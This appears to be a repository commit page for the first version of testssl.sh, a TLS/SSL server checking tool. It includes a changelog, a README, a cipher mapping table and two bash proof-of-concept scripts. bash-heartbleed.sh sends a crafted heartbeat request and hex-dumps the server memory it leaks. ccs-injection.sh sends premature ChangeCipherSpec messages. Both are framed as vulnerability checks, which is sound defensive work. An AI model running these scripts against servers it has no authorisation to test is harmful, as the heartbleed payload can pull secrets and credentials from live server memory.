Git/testssl.sh
1
0
Fork 0
mirror of https://github.com/drwetter/testssl.sh.git synced 2024-12-28 04:19:44 +01:00
Code Issues Packages Projects Releases Wiki Activity

- first try to commit here

Browse Source
This commit is contained in:
Dirk Wetter 2014-07-01 16:28:16 +02:00
parent ed895bde26
commit 9a689bbffc
9 changed files with 3068 additions and 0 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

313
CHANGELOG.txt Normal file
View File

@ -0,0 +1,313 @@
2.0 includes:
* major release, new features:
* SNI
* STARTTLS fully supported
* RC4 check
* (P)FS check
* SPDY check
* color codes make more sense now
* cipher hexcodes are shown
* tests ciphers per protocol
* HSTS
* web and application server banner
* server prefereences
* TLS server extensions
* server key size
* cipher suite mapping from openssl to RFC
* heartbleed check
* CCS injection check
---------------------
Details:
1.106
- minor fixes
1.105
- NEW: working prototype for CCS injection
1.104
- NEW: everywhere *also* RFC style ciphers -- if the mapping file is found
- unitary calls to display cipher suites
1.103
- NEW: telnet support for STARTTLS (works only with a patched openssl version)
--> not tested (lack of server)
1.102
- NEW: test for BREACH (experimental)
1.101
- BUGFIX: muted too verbose output of which on CentOS/RHEL
- BUGFIX: muted too verbose output of netcat/nc on CentOS/RHEL+Debian
1.100
- further cleanup
- starttls now tests allciphers() instead of cipher_per_proto
(normal use case makes most sense here)
- ENV J_POSITIV --> SHOW_EACH_C
- finding mapping-rfc.txt is now a bit smarter
- preparations for ChaCha20-Poly1305 (would have provided binaries but
"openssl s_client -connect" with that ciphersuite fails currently with
a handshake error though client and server hello succeeded!)
1.99
- BUGFIX: now really really everywhere testing the IP with supplied name
- locking out openssl < 0.9.8f, new function called "old_fart" ;-)
- FEATURE: displaying PTR record of IP
- FEATURE: displaying further IPv4/IPv6 addresses
- bit of a cleanup
1.98
- http_header is in total only called once
- better parsing of default protocol (FIXME shouldn't appear anymore)
1.97
- reduced sleep time for server hello and payload reply (heartbleed)
1.96
- NEW: (experimental) heartbleed support with bash sockets (shell only SSL handshake!)
see also https://testssl.sh/bash-heartbleed.sh
1.95 (2.0rc3)
- changed cmdline options for CRIME and renego vuln to uppercase
- NEW: displays server key size now
- NEW: displays TLS server extensions (might kill old openssl versions)
- brown warning if HSTS < 180 days
- brown warning if SSLv3 is offered as default protocol
1.94
- NEW: prototype of mapping to RFC cipher suite names, needed file mapping-rfc.txt in same dir
as of now only used for 'testssl.sh -V'
- internal renaming: it was supposed to be "cipherlists" instead of "ciphersuites"
- additional tests for cipherlists DES, 3DES, ADH
1.93
- BUGFIX: removed space in Server banner fixed (at the expense of showing just nothing if Server string is empty)
1.92
- BUGFIX: fixed error of faulty detected empty server string
1.91
- replaced most lcyan to brown (=not really bad but somehow)
- empty server string better displayed
- prefered CBC TLS 1.2 cipher is now brown (lucky13)
1.90
- fix for netweaver banner (server is lowercase)
- no server banner is no disadvantage (color code)
- 1 more blank proto check
- server preference is better displayed
1.89
- reordered! : protocols + cipher come first
- colorized prefered server preference (e.g. CBC+RC4 is light red now, TLSv1.2 green)
- SSLv3 is now light cyan
- NEW: -P|--preference now in help menu
- light cyan is more appropriate than red for HSTS
1.88
- NEW: prototype for protocol and cipher preference
- prototype for session ticket
1.87
- changed just the version string to rc1
1.86
- NEW: App banner now production, except 2 liners
- DEBUG: 1 is now true as everywhere else
- CRIME+Renego prettier
- last optical polish for RC4, PFS
1.85
- NEW: appbanner (also 2 lines like asp.net)
- OSSL_VER_MAJOR/MINOR/APPENDIX
- less bold because bold headlines as bold should be reserved for emphasize findings
- tabbed output also for protocols and cipher classes
- unify neat printing
1.84
- NEW: deprecating openssl version <0.98
- displaying a warning >= 0.98 < 1.0
- NEW: neat print also for all ciphers (-E,-e)
1.83
- BUGFIX: results from unit test: logical error in PFS+RC4 fixed
- headline of -V / PFS+RC4 ciphers unified
1.82
- NEW: output for -V now better (bits seperate, spacing improved)
1.81
- output for RC4+PFS now better (with headline, bits seperate, spacing improved)
- both also sorted by encr. strength .. umm ..err bits!
1.80
- order of finding supplied binary extended (first one wins):
1. use supplied variable $OPENSSL
2. use "openssl" in same path as testssl.sh
3. use "openssl.`uname -m`" in same path as testssl.sh
4. use anything in system $PATH (return value of "which"
1.79
- STARTTLS options w/o trailing 's' now (easier)
- commented code for CRIME SPDY
- issue a warning for openssl < 0.9.7 ( that version won't work anyway probably)
- NPN protos as a global var
- pretty print with fixed columns: PFS, RC4, allciphers, cipher_per_proto
1.78
- -E, -e now sorted by encryption strength (note: it's only encr key length)
- -V now pretty prints all local ciphers
- -V <pattern> now pretty prints all local ciphers matching pattern (plain string, no regex)
- bugfix: SSLv2 cipher hex codes has 3 bytes!
1.77
- removed legacy code (PROD_REL var)
1.76
- bash was gone!! desaster for Ubuntu, fixed
- starttls+rc4 check: bottom line was wrong
- starttls had too much output (certificate) at first a/v check
1.75
- location is now https://testssl.sh
- be nice: banner, version, help also works for BSD folks (on dash)
- bug in server banner fixed
- sneaky referer and user agent possible
1.74
- Debian 7 fix
- ident obsoleted
1.72
- removed obsolete GREP
- SWURL/SWCONTACT
- output for positive RC4 better
1.71
- workaround for buggy bash (RC4)
- colors improved
- blue is now reserved for headline
- magenta for local probs
- in RC4 removal of SSL protocol provided by openssl
1.70
- DEBUG in http_headers now as expected
- <?xml marker as HTML body understood
1.69
- HTTP 1.1 header
- removed in each cipher the proto openssl is returning
+ NEW: cipher_per_proto
1.68
- header parser for openssl
- HSTS
- server banner string
- vulnerabilities closer+condensed
1.68
- header parser for openssl
- HSTS
- server banner string
- vulnerabilities closer+condensed
1.67
- signal green if no SSLv3
- cipher hex code now in square brackets
[..]
1.36
* fixed issue while connecting to non-webservers
1.35
* fixed portability issue on Ubuntu
1.34
* ip(v4) address in output, helps to tell different systems apart later on
* local hostname in output
1.31 (Halloween Release)
* bugfix: SSLv2 was kind of borken
* now it works for sure but ssl protocol are kind of ugly
1.30b (25.10.2012)
* bugfix: TLS 1.1/1.2 may lead to false negatives
* bugfix: CMDLINE -a/-e was misleading, now similar to help menu
1.3 (10/13/2012)
* can test now for cipher suites only
* can test now for protocols suites only
* tests for tls v1.1/v1.2 of local openssl supports it
* commandline "all "is rename to "each-cipher"
* banner when it's done
1.21a (10/4/2012)
* tests whether openssl has support for zlib compiled so that it avoids a false negative
1.21 (10/4/2012)
* CRIME support
1.20b
* bugfixed release
1.20a
* code cleanup
* showciphers variable introduced: only show ciphers if this is set (it is by
default now and there's a comment
* openssl version + path to it in the banner
1.20
* bugfix (ssl in ssl handshake failure is sometimes too much)
* date in output
* autodetection of CVS version removed
1.19
* bugfix
1.18
* Rearragement of arguments: URL comes now always last!
* small code cleanups for readability
* individual cipher test is now with bold headline, not blue
* NOPARANOID flag tells whether medium grade ciphers are ok. NOW they are (=<1.17 was paranoid)
1.17
* SSL tests now for renegotiation vulnerabilty!
* version detection of testssl.sh
* program has a banner
* fixed bug leading to a file named "1"
* comment for 128Bit ciphers
1.16
* major code cleanups
* cmd line options: port is now in first argument!!
* help is more verbose
* check whether on other server side is ssl server listening
* https:// can be now supplied also on the command line
* test all ciphers now
* new cleanup routine
* -a does not do standard test afterward, you need to run testssl a second
time w/o -a if you want this
1.12
* tests also medium grade ciphers (which you should NOT use)
* tests now also high grade ciphers which you SHOULD ONLY use
* switch for more verbose output of cipher for those cryptographically interested .
in rows: SSL version, Key eXchange, Authentication, Encryption and Message Authentication Code
* this is per default enabled (provide otherwise "" as VERB_CLIST)
* as a courtesy I am providing 64+32 Linux binaries for testing 56 Bit ciphers
1.11
* Hint for howto enable 56 Bit Ciphers
* possible to specify where openssl is (hardcoded, $ENV, last resort: auto)
* warns if netcat is not there
1.10
* somewhat first released version

160
README.html Executable file
View File

@ -0,0 +1,160 @@
<br>
<strong>testssl.sh</strong> is a <a href="LICENSE.txt" title="GPL v2">free</a> Unix command line tool which checks a server's service
on any port for the support of TLS/SSL ciphers, protocols as well as some cryptographic flaws.
It's designed to provide clear output for a "is this good or bad" decision.
<br><br>
<a href="testssl-standard.png"><img src="testssl-standard.50p.png" title="Standard call: testssl.sh <hostname>"
onmouseover="this.src='testssl-standard.png'" onmouseout="this.src='testssl-standard.50p.png';"
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:25px; margin-right:15px; margin-bottom:10px; float:right" alt="Standard call: testssl.sh <hostname>"></a>
It is working on every Linux distribution which has OpenSSL installed. As for security reasons some distributors
outphase the buggy stuff &ndash; and this is exactly you want to check for &ndash; it's recommended to compile OpenSSL by
yourself or check out the OpenSSL binaries below (Linux). You will get a warning though if your OpenSSL client
cannot perform a specific check, see below.
<br>
<br>
testssl.sh is portable, it is supposed to work on
any other Unix system (preferably with GNU tools) and on cygwin, supposed it can find the OpenSSL binary.
<br><br>
<strong>New features</strong>
<ul>
<li>2.0: Features: <ul>
<li>SNI</li>
<li>STARTTLS</li>
<li>server preferences for protocols and ciphers</li>
<li>checks for: RC4, PFS, SPDY</li>
<li>web and app server banner, HSTS</li>
<li>server key size</li>
<li>TLS session tickets</li>
<li>TLS server extensions</li>
<li>heartbleed check from <a href="https://testssl.sh/bash-heartbleed.sh">bash-heartbleed.sh</a> with shell only SSL handshake!</li>
<li>CCS check from <a href="https://testssl.sh/ccs-injection.sh">ccs-injection.sh</a> with shell only SSL handshake!</li>
<li>somewhat smart check for BREACH vulnerability</li>
<li>prelease of cipher suites name space mapping OpenSSL &lt;--&gt; RFC</li>
<li>aaand: neat output</li>
</ul
</li>
<li>1.40: cleanups, path of URL supplied on the command line (is ignored for now) </li>
<li>1.30: can test now for cipher suites / protocols only, tests for tls v1.1/v1.2 , -a/--all renamed </li>
<li>1.21: CRIME support, see http://threatpost.com/en_us/blogs/new-attack-uses-ssltls-information-leak-hijack-https-sessions-090512.</li>
<li>1.18: Rearragement of arguments: URI comes now always last. NOPARANOID flag tells whether medium grade ciphers are ok. </li>
<li>1.17: tests now for renegotiation vulnerabity, see (<a href="http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2009-3555" target="_blank" title="opens in new tab/window">CVE-2009-3555)</a></li>
<li>1.16: Invoking options changed with this release. Port and hostname / URL will be accepted only as one argument. major code cleanups. Also
checks now whether SSL is listening on the server side at all. <i>-a</i>/<i>--all</i> tests cipher by cipher now.</li>
<li>[..]</li>
<li>More see <a href="CHANGELOG.txt">CHANGELOG</a>.</li>
</ul>
<p style="clear:left"></p>
<br><br>
<strong>Calling</strong>
<br><br>
Starting testssl.sh with no params will give you a clue how to use it:
<a href="testssl-E.png"><img src="testssl-E.33p.png" title="check each ciphers per protocol" onmouseover="this.src='testssl-E.png'" onmouseout="this.src='testssl-E.33p.png';"
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:10px; margin-bottom:10px; margin-right:25px; float:right" alt="check each ciphers per protocol"></a>
<pre>userid@<strong>somehost</strong>:~ % testssl.sh
testssl.sh &lt;options&gt; URI
where &lt;options&gt; is <strong>one</strong> of
&lt;-h|--help&gt; what you're looking at
&lt;-b|--banner&gt; displays banner + version
&lt;-v|--version&gt; same as above
&lt;-V|--local&gt; pretty print all local ciphers
&lt;-V|--local&gt; &lt;hexcode&gt; what cipher is &lt;pattern hexcode&gt;?
&lt;-e|--each-cipher&gt; check each local ciphers remotely
&lt;-E|-ee|--cipher-per-proto&gt; check those per protocol
&lt;-f|--ciphers&gt; check cipher suites
&lt;-p|--protocols&gt; check TLS/SSL protocols only
&lt;-P|--preference&gt; displays the servers picks: protocol+cipher
&lt;-y|--spdy&gt; checks for SPDY/NPN
&lt;-B|--heartbleed&gt; tests only for heartbleed vulnerability
&lt;-I|--ccs|--ccs_injection&gt; tests only for CCS injection vulnerability
&lt;-R|--renegotiation&gt; tests only for renegotiation vulnerability
&lt;-C|--crime&gt; tests only for CRIME vulnerability
&lt;-T|--breach&gt; tests only for BREACH vulnerability
&lt;-s|--pfs|--fs|--nsa&gt; checks (perfect) forward secrecy settings
&lt;-4|--rc4|--appelbaum&gt; which RC4 ciphers are being offered?
&lt;-H|--header|--headers&gt; check for HSTS and server banner string
URI is host|host:port|URL|URL:port
(port 443 is assumed unless otherwise specified)
&lt;-t|--starttls&gt; host:port &lt;ftp|smtp|pop3|imap|xmpp|telnet&gt; *) &lt;SNI hostname&gt;
*) for STARTTLS telnet support you need a patched openssl version (to be provided soon)
userid@<strong>somehost</strong>:~ %</pre>
Normal use case is probably just "testssl.sh &lt;hostname&gt;", see first picture above. "testssl.sh -E &lt;hostname&gt;" was used in the
second picture above. A STARTTLS check (see last picture) would be achieved with e.g.
<pre>
testssl.sh --starttls &lt;smtphostname&gt;.&lt;tld&gt;:587 smtp
testssl.sh -t &lt;jabberhostname&gt;.&lt;tld&gt;:5222 xmpp
testssl.sh --starttls &lt;pophostname&gt;.&lt;tld&gt;:110 pop3
</pre>
As the help says: Currently only one option at a time works.
<br>
A maybe neat feature: If you want to find out what local ciphers you have and
print them pretty, use "testssl.sh -V". Ever wondered what hexcode a cipher is?
"testssl.sh -V 9f" lets you search for the hexcode 9f. If you have the file
"mapping-rfc.txt" in the same directory "testssl.sh -V" <a
href="https://twitter.com/drwetter/status/456126567547039744/photo/1"
title="picture" target="_blank">displays</a> the matching RFC style cipher
suite name. Also during every cipher suite test the corresponding RFC style name is
displayed. It's a broad output. If you don't want this, you need to move mapping-rfc.txt
away -- for now.
<br><br> Got it so far? Good. <br>
<a href="testssl-starttls-localssl.png"><img src="testssl-starttls-localssl.25p.png" title="STARTTLS check with Ubuntu's 12.04 OpenSSL"
onmouseover="this.src='testssl-starttls-localssl.png'" onmouseout="this.src='testssl-starttls-localssl.25p.png'"
style="box-shadow: 0 5px 5px 5px #AAAAAA; border: 0px solid; margin-left:10px; margin-bottom:10px; margin-right:35px; margin-top:15px; float:left" alt="STARTTLS check with Ubuntu's 12.04 OpenSSL, no recompiled OpenSSL"></a>
<br>
<br>
<strong>Hint regarding OpenSSL binary</strong>
<br><br>
As mentioned above, a prerequisite for thoroughly checking SSL/TLS enabled servers is: all you want to check for has to be
available on your client. Transport encryption is not only depending on the server but also on your crypto provider on the client side &ndash;
especially if you want to use it for testing.
So there are drawbacks out of the Linux distributions boxes -- so to speak:
<ul>
<li> one cannot check 56 Bit ciphers as they are disabled during compile time. </li>
<li> some ciphers are disabled for security reasons, </li>
<li> support maybe not included (to disable CRIME)</li>
<li> and last but not least: SSLv2 seems to be outphased too, <a href="https://bugs.launchpad.net/ubuntu/+source/openssl/+bug/955675" title="Ubuntu's Lauchpad: not even the manpage is updated since 2 years" target="_blank">Ubuntu</a> started this.</li>
</ul>
Thus the <a href="openssl-1.0.2-beta1.linux64_32bit.tar.gz.asc" title="GPG signed">signed</a> tarball provides specially compiled statically linked (except glibc and the loader)
<a href="openssl-1.0.2-beta1.linux64_32bit.tar.gz">OpenSSL binaries</a> as a courtesy. If you don't want this, you'll get a warning in magenta, see picture on the right hand side.
You'll need to unpack the binaries, dump the one you need either in the same location as testssl.sh, named just &quot;openssl&quot; or &quot;openssl.`uname -m`&quot;.
You can also tell testssl.sh via environment variable where your openssl binary is:
<pre>export OPENSSL=&lt;path_to_myopenssl&gt;</pre> before you use testssl. Or issue <pre>OPENSSL=&lt;path_to_myopenssl&gt; testssl.sh &lt;hostname&gt;</pre>
Don't try outdated OpenSSL versions before 1.0! Those versions are deprecated, you likely will not get very far. testssl.sh is not locking
those out but things might not work as expected. Support will be retired soon.
<br><br>
<strong>Misc</strong>
<br><br>
Feedback, bugs and contributions are appreciated, see contact in <a href="testssl.sh" type="text/plain">testssl.sh</a> (<i>dirk aet testssl dot sh</i>).
<br><br>
I post all significant updates on Twitter (<a href="http://twitter.com/drwetter" title="@drwetter" target="_blank">@drwetter</a>).
&nbsp;
<br>
<br>
<div style="color: #999999; font-size: 11px; text-align: right;"><a href="http://drwetter.eu/neu/impressum.shtml">Imprint</a>&nbsp;&nbsp;</div>
<hr>
<br>
<!-- $Id: README.html,v 1.35 2014/06/15 20:07:18 dirkw Exp $ -->
</html>
</body>

23
bash-heartbleed.changelog.txt Normal file
View File

@ -0,0 +1,23 @@
1.7, 2014-04-30 23:06:55 +0200;
- legal disclaimer
----------------------------
1.6 2014-04-18 14:01:19 +0200;
- possible to supply URLs now
- cleanup
----------------------------
1.5, 2014-04-18 11:01:51 +0200;
- broader ascii output
- back at 64k
----------------------------
1.4, 2014-04-15 21:56:47 +0200;
- few comments for educational purposes added
----------------------------
1.3,
- retrieves data
----------------------------
1.2, 2014-04-15 20:58:55 +0200;
- PoC complete
----------------------------
1.1, 2014-04-15 20:47:48 +0200;
- Initial version

145
bash-heartbleed.sh Normal file
View File

@ -0,0 +1,145 @@
#!/bin/bash
# POC bash socket implementation of heartbleed (CVE-2014-0160), see also http://heartbleed.com/
# Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt
#
# sockets inspired by http://blog.chris007.de/?p=238
# heartbleed mainly adapted from https://gist.github.com/takeshixx/10107280
#
###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! #######
NODE=""
SLEEP=2
COL_WIDTH=32
[ -z "$1" ] && exit 1
# TLS 1.0=x01 1.1=0x02, 1.2=0x3
# the PoC contains per default only check for TLS1.0 as the is the least common denominator
TLSV=${2:-x01}
heartbleed_payload="\x18\x03\tls_version\x00\x03\x01\x40\x00"
## ^^^^^^^ this is the thing!
client_hello="
# TLS header ( 5 bytes)
,x16, # Content type (x16 for handshake)
x03, tls_version, # TLS Version
x00, xdc, # Length
# Handshake header
x01, # Type (x01 for ClientHello)
x00, x00, xd8, # Length
x03, tls_version, # TLS Version
# Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html
x53, x43, x5b, x90, x9d, x9b, x72, x0b,
xbc, x0c, xbc, x2b, x92, xa8, x48, x97,
xcf, xbd, x39, x04, xcc, x16, x0a, x85,
x03, x90, x9f, x77, x04, x33, xd4, xde,
x00, # Session ID length
x00, x66, # Cipher suites length
# Cipher suites (51 suites)
xc0, x14, xc0, x0a, xc0, x22, xc0, x21,
x00, x39, x00, x38, x00, x88, x00, x87,
xc0, x0f, xc0, x05, x00, x35, x00, x84,
xc0, x12, xc0, x08, xc0, x1c, xc0, x1b,
x00, x16, x00, x13, xc0, x0d, xc0, x03,
x00, x0a, xc0, x13, xc0, x09, xc0, x1f,
xc0, x1e, x00, x33, x00, x32, x00, x9a,
x00, x99, x00, x45, x00, x44, xc0, x0e,
xc0, x04, x00, x2f, x00, x96, x00, x41,
xc0, x11, xc0, x07, xc0, x0c, xc0, x02,
x00, x05, x00, x04, x00, x15, x00, x12,
x00, x09, x00, x14, x00, x11, x00, x08,
x00, x06, x00, x03, x00, xff,
x01, # Compression methods length
x00, # Compression method (x00 for NULL)
x00, x49, # Extensions length
# Extension: ec_point_formats
x00, x0b, x00, x04, x03, x00, x01, x02,
# Extension: elliptic_curves
x00, x0a, x00, x34, x00, x32, x00, x0e,
x00, x0d, x00, x19, x00, x0b, x00, x0c,
x00, x18, x00, x09, x00, x0a, x00, x16,
x00, x17, x00, x08, x00, x06, x00, x07,
x00, x14, x00, x15, x00, x04, x00, x05,
x00, x12, x00, x13, x00, x01, x00, x02,
x00, x03, x00, x0f, x00, x10, x00, x11,
# Extension: SessionTicket TLS
x00, x23, x00, x00,
# Extension: Heartbeat
x00, x0f, x00, x01, x01
"
msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
parse_hn_port() {
PORT=443 # unless otherwise auto-determined, see below
NODE="$1"
# strip "https", supposed it was supplied additionally
echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
# strip trailing urlpath
NODE=`echo $NODE | sed -e 's/\/.*$//'`
# determine port, supposed it was supplied additionally
echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed
's/\:.*$//'`
}
socksend() {
data=`echo $1 | sed 's/tls_version/'"$2"'/g'`
echo "\"$data\""
echo -en "$data" >&5 &
sleep $SLEEP
}
sockread()
{
reply=`dd bs=$1 count=1 <&5 2>/dev/null`
}
#### main
parse_hn_port "$1"
if ! exec 5<> /dev/tcp/$NODE/$PORT; then
echo "`basename $0`: unable to connect to $NODE:$PORT"
exit 2
fi
# socket is now open with fd 5
echo "##### sending client hello:"
socksend "$msg" $TLSV
sockread 10000
echo "##### server hello:"
echo -e "$reply" | xxd | head -20
echo "[...]"
echo
echo "##### sending payload with TLS version $TLSV:"
socksend $heartbleed_payload $TLSV
sockread 65534
echo "###### heartbleed reply: "
echo -e "$reply" | xxd -c$COL_WIDTH
echo
lines_returned=`echo -e "$reply" | xxd | wc -l`
if [ $lines_returned -gt 1 ]; then
tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
ret=1
else
tput bold; tput setaf 2; echo "ok"; tput sgr0
ret=0
fi
echo
exit $ret
# vim:tw=100:ts=5:sw=5
# $Id: bash-heartbleed.sh,v 1.6 2014/04/18 12:01:19 dirkw Exp $

186
ccs-injection.sh Executable file
View File

@ -0,0 +1,186 @@
#!/bin/bash
# POC bash socket implementation of CCS Injection vulnerability in OpenSSL (CVE-2014-0224), see https://www.openssl.org/news/secadv_20140605.txt
# Author: Dirk Wetter, GPLv2 see https://testssl.sh/LICENSE.txt
#
# sockets inspired by http://blog.chris007.de/?p=238
# mainly adapted from the C code from https://gist.github.com/rcvalle/71f4b027d61a78c42607
# thx Ramon de C Valle
#
###### DON'T DO EVIL! USAGE AT YOUR OWN RISK. DON'T VIOLATE LAWS! #######
NODE=""
SLEEP=2
DEBUG=${DEBUG:-0}
[ -z "$1" ] && exit 1
# TLS 1.0=x01 1.1=0x02, 1.2=0x3
# the PoC contains per default only check for TLS1.0 as the is the least common denominator
TLSV=${2:-x01}
ccs_message="\x14\x03\tls_version\x00\x01\x01"
## ^^^^^^^ this is the thing!
client_hello="
# TLS header ( 5 bytes)
,x16, # Content type (x16 for handshake)
x03, tls_version, # TLS Version
x00, x93, # Length
# Handshake header
x01, # Type (x01 for ClientHello)
x00, x00, x8f, # Length
x03, tls_version, # TLS Version
# Random (32 byte) Unix time etc, see www.moserware.com/2009/06/first-few-milliseconds-of-https.html
x53, x9c, xb2, xcb, x4b,
x42, xf9, x2d, x0b, xe5, x9c, x21, xf5, xa3, x89, xca, x7a, xd9, xb4, xab, x3f,
xd3, x22, x21, x5e, xc4, x65, x0d, x1e, xce, xed, xc2,
x00, # Session ID length
x00, x68, # Cipher suites length
xc0, x13,
xc0, x12,
xc0, x11,
xc0, x10,
xc0, x0f,
xc0, x0e,
xc0, x0d,
xc0, x0c,
xc0, x0b,
xc0, x0a,
xc0, x09,
xc0, x08,
xc0, x07,
xc0, x06,
xc0, x05,
xc0, x04,
xc0, x03,
xc0, x02,
xc0, x01,
x00, x39,
x00, x38,
x00, x37,
x00, x36,
x00, x35,
x00, x34,
x00, x33,
x00, x32,
x00, x31,
x00, x30,
x00, x2f,
x00, x16,
x00, x15,
x00, x14,
x00, x13,
x00, x12,
x00, x11,
x00, x10,
x00, x0f,
x00, x0e,
x00, x0d,
x00, x0c,
x00, x0b,
x00, x0a,
x00, x09,
x00, x08,
x00, x07,
x00, x06,
x00, x05,
x00, x04,
x00, x03,
x00, x02,
x00, x01,
x01, x00"
msg=`echo "$client_hello" | sed -e 's/# .*$//g' -e 's/,/\\\/g' | sed -e 's/ //g' | tr -d '\n'`
parse_hn_port() {
PORT=443 # unless otherwise auto-determined, see below
NODE="$1"
# strip "https", supposed it was supplied additionally
echo $NODE | grep -q 'https://' && NODE=`echo $NODE | sed -e 's/https\:\/\///' `
# strip trailing urlpath
NODE=`echo $NODE | sed -e 's/\/.*$//'`
# determine port, supposed it was supplied additionally
echo $NODE | grep -q ':' && PORT=`echo $NODE | sed 's/^.*\://'` && NODE=`echo $NODE | sed
's/\:.*$//'`
}
socksend() {
data=`echo $1 | sed 's/tls_version/'"$2"'/g'`
echo "\"$data\""
echo -en "$data" >&5 || return 1
sleep $SLEEP
return 0
}
sockread()
{
reply=`dd bs=$1 count=1 <&5 2>/dev/null`
}
ok_ids(){
echo
tput bold; tput setaf 2; echo "ok -- something resetted our ccs packets"; tput sgr0
echo
exit 0
}
#### main
parse_hn_port "$1"
if ! exec 5<> /dev/tcp/$NODE/$PORT; then
echo "`basename $0`: unable to connect to $NODE:$PORT"
exit 2
fi
# socket is now open with fd 5
echo "##### sending client hello:"
socksend "$msg" $TLSV
sockread 5000
echo -e "\n##### server hello\c"
if test $DEBUG ; then
echo ":"
echo -e "$reply" | xxd -c32 | head -20
echo "[...]"
echo
fi
echo "##### sending ccs injection with TLS version $TLSV:"
socksend "$ccs_message" $TLSV || ok_ids
sleep 1
socksend "$ccs_message" $TLSV || ok_ids
sockread 65534
echo
echo "###### reply: "
echo -e "$reply" | xxd -c32
echo
reply_sanitized=`echo -e "$reply" | xxd -p | tr -cd '[:print:]' | sed 's/^..........//'`
test $DEBUG || echo $reply_sanitized
lines=`echo -e "$reply" | xxd -c32 | wc -l`
test $DEBUG || echo $lines
if [ "$lines" -gt 1 ] || [ "$reply_sanitized" == "0a" ] ;then
tput bold; tput setaf 2; echo "ok"; tput sgr0
ret=0
else
tput bold; tput setaf 1; echo "VULNERABLE"; tput sgr0
ret=1
fi
echo
exit $ret
# vim:tw=100:ts=5:sw=5
# $Id: ccs-injection.sh,v 1.3 2014/06/14 21:44:42 dirkw Exp $

362
mapping-rfc.txt Normal file
View File

@ -0,0 +1,362 @@
0x010080 SSL_CK_RC4_128_WITH_MD5
0x020080 SSL_CK_RC4_128_EXPORT40_WITH_MD5
0x030080 SSL_CK_RC2_128_CBC_WITH_MD5
0x040080 SSL_CK_RC2_128_CBC_EXPORT40_WITH_MD5
0x050080 SSL_CK_IDEA_128_CBC_WITH_MD5
0x060040 SSL_CK_DES_64_CBC_WITH_MD5
0x0700C0 SSL_CK_DES_192_EDE3_CBC_WITH_MD5
0x080080 SSL_CK_RC4_64_WITH_MD5
0x00 TLS_NULL_WITH_NULL_NULL
0x01 TLS_RSA_WITH_NULL_MD5
0x02 TLS_RSA_WITH_NULL_SHA
0x03 TLS_RSA_EXPORT_WITH_RC4_40_MD5
0x04 TLS_RSA_WITH_RC4_128_MD5
0x05 TLS_RSA_WITH_RC4_128_SHA
0x06 TLS_RSA_EXPORT_WITH_RC2_CBC_40_MD5
0x07 TLS_RSA_WITH_IDEA_CBC_SHA
0x08 TLS_RSA_EXPORT_WITH_DES40_CBC_SHA
0x09 TLS_RSA_WITH_DES_CBC_SHA
0x0A TLS_RSA_WITH_3DES_EDE_CBC_SHA
0x0B TLS_DH_DSS_EXPORT_WITH_DES40_CBC_SHA
0x0C TLS_DH_DSS_WITH_DES_CBC_SHA
0x0D TLS_DH_DSS_WITH_3DES_EDE_CBC_SHA
0x0E TLS_DH_RSA_EXPORT_WITH_DES40_CBC_SHA
0x0F TLS_DH_RSA_WITH_DES_CBC_SHA
0x10 TLS_DH_RSA_WITH_3DES_EDE_CBC_SHA
0x11 TLS_DHE_DSS_EXPORT_WITH_DES40_CBC_SHA
0x12 TLS_DHE_DSS_WITH_DES_CBC_SHA
0x13 TLS_DHE_DSS_WITH_3DES_EDE_CBC_SHA
0x14 TLS_DHE_RSA_EXPORT_WITH_DES40_CBC_SHA
0x15 TLS_DHE_RSA_WITH_DES_CBC_SHA
0x16 TLS_DHE_RSA_WITH_3DES_EDE_CBC_SHA
0x17 TLS_DH_anon_EXPORT_WITH_RC4_40_MD5
0x18 TLS_DH_anon_WITH_RC4_128_MD5
0x19 TLS_DH_anon_EXPORT_WITH_DES40_CBC_SHA
0x1A TLS_DH_anon_WITH_DES_CBC_SHA
0x1B TLS_DH_anon_WITH_3DES_EDE_CBC_SHA
0x1C SSL_FORTEZZA_KEA_WITH_NULL_SHA
0x1D SSL_FORTEZZA_KEA_WITH_FORTEZZA_CBC_SHA
0x1E TLS_KRB5_WITH_DES_CBC_SHA
0x1F TLS_KRB5_WITH_3DES_EDE_CBC_SHA
0x20 TLS_KRB5_WITH_RC4_128_SHA
0x21 TLS_KRB5_WITH_IDEA_CBC_SHA
0x22 TLS_KRB5_WITH_DES_CBC_MD5
0x23 TLS_KRB5_WITH_3DES_EDE_CBC_MD5
0x24 TLS_KRB5_WITH_RC4_128_MD5
0x25 TLS_KRB5_WITH_IDEA_CBC_MD5
0x26 TLS_KRB5_EXPORT_WITH_DES_CBC_40_SHA
0x27 TLS_KRB5_EXPORT_WITH_RC2_CBC_40_SHA
0x28 TLS_KRB5_EXPORT_WITH_RC4_40_SHA
0x29 TLS_KRB5_EXPORT_WITH_DES_CBC_40_MD5
0x2A TLS_KRB5_EXPORT_WITH_RC2_CBC_40_MD5
0x2B TLS_KRB5_EXPORT_WITH_RC4_40_MD5
0x2C TLS_PSK_WITH_NULL_SHA
0x2D TLS_DHE_PSK_WITH_NULL_SHA
0x2E TLS_RSA_PSK_WITH_NULL_SHA
0x2F TLS_RSA_WITH_AES_128_CBC_SHA
0x30 TLS_DH_DSS_WITH_AES_128_CBC_SHA
0x31 TLS_DH_RSA_WITH_AES_128_CBC_SHA
0x32 TLS_DHE_DSS_WITH_AES_128_CBC_SHA
0x33 TLS_DHE_RSA_WITH_AES_128_CBC_SHA
0x34 TLS_DH_anon_WITH_AES_128_CBC_SHA
0x35 TLS_RSA_WITH_AES_256_CBC_SHA
0x36 TLS_DH_DSS_WITH_AES_256_CBC_SHA
0x37 TLS_DH_RSA_WITH_AES_256_CBC_SHA
0x38 TLS_DHE_DSS_WITH_AES_256_CBC_SHA
0x39 TLS_DHE_RSA_WITH_AES_256_CBC_SHA
0x3A TLS_DH_anon_WITH_AES_256_CBC_SHA
